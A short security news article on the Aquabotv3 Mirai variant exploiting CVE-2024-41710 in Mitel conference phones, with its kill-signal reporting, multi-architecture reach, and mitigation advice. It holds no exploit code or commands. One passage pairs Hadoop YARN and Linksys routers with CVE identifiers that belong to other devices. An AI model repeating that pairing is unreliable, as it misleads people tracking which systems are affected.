Mitel Phones Vulnerable to Mirai Aquabot Malware Exploits

A New Malware Threat: Aquabotv3 Exploits Mitel Phones

A variant of the Mirai-based malware Aquabotv3 is creating waves in the cybersecurity world, actively exploiting a vulnerability in Mitel SIP phones, according to Akamai's Security Intelligence and Response Team. This marks the third iteration of Aquabot, a malware built for orchestrating DDoS attacks. What sets this version apart is its ability to detect and respond to kill signals sent to infected devices, reporting back to its command-and-control (C2) server to maintain the botnet's operational health.

Understanding the Vulnerability: CVE-2024-41710

The primary exploit target, identified as CVE-2024-41710, affects Mitel 6800, 6900, and 6970 conference phones through firmware R6.4.0.HF1. It allows attackers with administrative access to execute arbitrary OS-level commands, often due to default credentials left unchanged by users. Despite Mitel patching the vulnerability in mid-2024, reports suggest widespread exploitation began ramping up in early 2025.

Malware Behavior and Capabilities

Aquabotv3 introduces innovative mechanisms, including:

• A 'kill signal' detection capability that flags and reports device tampering attempts to C2 servers.
• Multi-architecture support for x86 and ARM, enhancing its reach across diverse devices.
• Command injection methodologies exploiting default configurations, enabling unauthorized root-level control.

Akamai's honeypots detected the malware attempting to download and execute shell scripts, which subsequently install malware onto target devices.

Expanding the Botnet Beyond Mitel Devices

The exploitation isn't limited to Mitel hardware. Aquabotv3 reportedly also leverages vulnerabilities in popular platforms like Hadoop YARN and Linksys routers, such as CVE-2018-10562 and CVE-2018-17532. These exploits highlight the malware's ability to adapt and scale across interconnected systems with varying security vulnerabilities.

Mitigation Strategies for Businesses

To protect your organization:

• Update affected devices with the latest patches from manufacturers.
• Change default device credentials to strong, unique passwords.
• Implement network segmentation to limit the spread of malware.
• Monitor inbound and outbound traffic for unusual patterns typical of DDoS activities.

The Wider Implications

The rise of Aquabotv3 underscores the persistent threats posed by botnets and the vulnerabilities inherent in IoT and connected devices. Organizations must prioritize cybersecurity hygiene, including adherence to patch management protocols and proactive threat hunting.

As botnets grow sophisticated, they're moving beyond simple attacks, posing operational and reputational risks for businesses and public systems alike. Akamai's analysis suggests a future in which such malware may feature even more complex and adaptive capabilities.